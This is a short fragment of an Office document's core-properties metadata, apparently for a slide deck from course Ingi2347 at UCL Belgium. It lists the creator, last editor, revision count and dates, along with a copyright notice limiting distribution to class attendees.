  <dc:subject>Course Ingi2347 UCL Belgium</dc:subject>
  <dc:creator>Gildas Avoine</dc:creator>
  <dc:description>This document is copyrighted and must not be distributed to people who do not attend the class.</dc:description>
  <cp:lastModifiedBy>Marco Canini</cp:lastModifiedBy>
  <cp:revision>323</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-01-31T23:36:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-01-28T10:21:32Z</dcterms:modified>
</cp:coreProperties>
</file>